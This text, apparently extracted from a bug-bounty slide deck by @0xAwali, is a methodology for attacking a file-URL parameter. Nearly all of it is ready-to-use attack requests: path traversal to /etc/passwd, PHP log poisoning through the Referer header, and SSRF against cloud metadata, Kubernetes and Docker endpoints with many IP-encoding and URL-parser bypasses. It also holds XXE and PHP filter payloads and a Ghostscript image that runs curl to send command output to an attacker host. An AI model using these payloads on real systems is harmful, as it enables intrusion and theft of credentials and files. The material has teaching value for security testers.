Interaction-File-URL
Interaction-File-URL
File - URL
https://www.company.com
Mahmoud M. Awali
@0xAwali
My Methodology
attacker
● Blog
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Blog User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Blog Referer: https://previous.com/path
Origin: https://www.company.com
● Writeup Content-Length: Number
File-URL=../../../../../etc/passwd
My Methodology
attacker
● Tweet
My Methodology
attacker
● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=../../../../../etc/passwd%00
My Methodology
attacker
● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: <?php system('id');?>
Origin: https://www.company.com
Content-Length: Number
File-URL=../../../../../proc/self/fd/Number-FUZZ
My Methodology
attacker
● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=jsp/etc/../../WEB-INF/web.xml
My Methodology
attacker
● Blog
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: https://previous.com/path
Origin: https://www.company.com
● Writeup Content-Length: Number
File-URL=https://id.burpcollaborator.net
My Methodology
attacker
● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=https://id.burpcollaborator.net#
My Methodology
attacker
● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=file:///etc/passwd
My Methodology
attacker
● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Blog User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=file:///etc/./passwd
My Methodology
attacker
● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=file://\/\/etc/passwd
My Methodology
attacker
● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=view-source:file:///etc/passwd
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: https://previous.com/path
Origin: https://www.company.com
● Writeup Content-Length: Number
File-URL=http://127.0.0.1:PORT
● Writeup
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Blog User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://169.254.169.254/latest/user-data
My Methodology
attacker
attacker
● Resource
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://127.0.0.1:2379/v2/keys/?recursive=true
My Methodology
attacker
● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=https://kubernetes.default.svc/metrics
My Methodology
attacker
File-URL=https://metadata.google.internal/computeMetadata/v1be
ta1/?recursive=true
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://169.254.169.254.xip.io/latest/user-data
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://1ynrnhl.xip.io/latest/user-data
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://www.company.com1ynrnhl.xip.io/latest/user-data
My Methodology
attacker
Try To Change The HTTP Version From 1.1 To HTTP/0.9 And Remove The Host
Header To Bypass Blacklist
File-URL=http://169.254.169.254/latest/meta-data/iam/security-cred
entials/
My Methodology
attacker
● Tweet
My Methodology
attacker
● Tweet
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://425.510.425.510/
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://2852039166/
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://7147006462/
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://0xA9.0xFE.0xA9.0xFE/
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://0xA9FEA9FE/
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://0x41414141A9FEA9FE/
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://0251.0376.0251.0376/
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://0251.00376.000251.0000376/
My Methodology
attacker
Try To Mix Them e.g. Decimal Overflow + Hex + Octal e.g. http://425.254.0xa9.0376/
To Bypass Blacklist
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://425.254.0xa9.0376/
My Methodology
attacker
Try To Convert Only Parts Of The Address e.g. Octal + Hex + 2-Byte Wide Dotless
Decimal e.g. http://0251.0xfe.43518/ OR https://0251.254.169.254 To Bypass Blacklist
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://0251.0xfe.43518/
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://[::169.254.169.254]/
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://[::ffff:169.254.169.254]/
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://127.127.127.127.127/
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://0.0.0..0:PORT/
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: https://previous.com/path
Origin: https://www.company.com
● Writeup Content-Length: Number
File-URL=http://[::1]:2375/containers/json
● Writeup
My Methodology
attacker
● Video
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://nicob.net/redir-http-I.P.v.4:PORT
List Of Patterns To Bypass The Whitelist
attacker
http://google.com:80+&@127.88.23.245:22/#[email protected]:80/
http://127.88.23.245:22/+&@google.com:80#[email protected]:80/
http://google.com:80+&@google.com:80#[email protected]:22/
http://127.88.23.245:22/[email protected]:80/
http://127.88.23.245:22/#@www.google.com:80/
http://google.com:80\\@127.88.23.245:22
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
● Tweet http://127.1.1.1:80#\@127.2.2.2:80/
http://169。254。169。254/
http://169。254。169。254/
● Video http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ :80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
● Payloads http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥ :80/
http://⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥ :80/
http://[::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/
http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/
http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧ :80/
http://⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80/
http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80/
http://⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧ :80/
My Methodology
attacker
● Slides
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://www.company.com# @me.com
My Methodology
attacker
Try To Use Protocol Wrappers Other Than Http OR HTTPS e.g. SSH , SFTP , POP3 ,
IMAP , SMTP , FTP , DICT , GOPHER OR TFTP e.g. sftp://me.com To Bypass Blacklist
● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=sftp://me.com
Try To Use This Payload
attacker
File-URL=php://filter/convert.iconv.WINDOWS-936%2FCP1388|con
vert.base64-encode|convert.base64-encode|convert.iconv.UTF8%
2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|convert.ba
se64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4
899%2F%2FTRANSLIT|convert.quoted-printable-encode|convert.i
conv.WINDOWS-936%2FCP1388/resource=/etc/passwd%20#@%2
0read/resource=file:///etc/passwd
Try To Use This Payload
attacker
File-URL=php://filter/convert.iconv.WINDOWS-936%2FCP1388|con
vert.base64-encode|convert.base64-encode|convert.iconv.UTF8%
2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|convert.ba
se64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4
899%2F%2FTRANSLIT|convert.quoted-printable-encode|convert.i
conv.WINDOWS-936%2FCP1388/resource=/etc/passwd%20#@%2
0read/resource=file:///etc/passwd%20#[]@%20127.0.0.1:1337/inde
x.php?url=file:///etc/passwd
My Methodology
attacker
If You Got Blind SSRF Over HTTP OR HTTPS , Try To Request The Unresolvable
Subdomains Because There Are Reachable Subdomains Over Only VPN
● Tweet
My Methodology
attacker
If You Got Blind SSRF Over HTTP OR HTTPS , Try To Request An Internal URL That
Performs Another SSRF That Calls Out To Your Domain e.g. Apache Solr Is Running Internally
File-URL=http://apache-solr.company.com/solr/gettingstarted/sele
ct?q={!xmlparser v='<!DOCTYPE a SYSTEM
"http://me.com/"'><a></a>'
My Methodology
attacker
● Slides
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Blog User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http:// 127.0.0.1:PORT/Home/Index?
Reading From Remote XML File
attacker
root@mine:~#cat file.xml
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY read SYSTEM "file:///etc/passwd">
]>
<root><email>&read;</email></root>
File-URL=https://me.com/file.xml
Reading From Remote mp4 File
attacker
root@mine:~#cat file.mp4
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://me.com/2.mp4
#EXT-X-ENDLIST
File-URL=https://me.com/file.mp4
Reading From Remote Image
attacker
root@mine:~#cat file.jpg
%!PS
userdict /setpagedevice undef
Save
Legal
{null restore} stopped {pop} if
{legal} stopped {pop} if
Restore
mark /OutputFile (%pipe%curl${IFS}me.com/`id`)
currentdevice putdeviceprops
● Blog
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=https://me.com/file.jpg
Interaction With Remote URL
attacker
root@mine:~#cat index.php
<?php
header("Location: http://[::]:22/");
?>
File-URL=https://me.com/index.php
Interaction With Remote URL II
attacker
root@mine:~#cat index.php
<?php
header("Location: http://169.254.169.254/latest/meta-data/", TRUE, 303);
?>
File-URL=https://me.com/index.php
Interaction With Remote URL III
attacker
Steps to produce :-
attacker
● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
File-URL=http://brutelogic.com.br/poc.svg
My Methodology
attacker
If You Can Embedded Videos From Services e.g. Vimeo , Youtube , Twitter , AND
Facebook , Try To Inject XSS Payloads In Their Title AND Description To Get XSS
● Tweet
My Methodology
attacker
attacker
Try To Use DNS Rebinding Technique By Using Tools e.g. Singularity OR rebind.py
To Bypass The Blacklist
● Video
● Video Steps to produce :-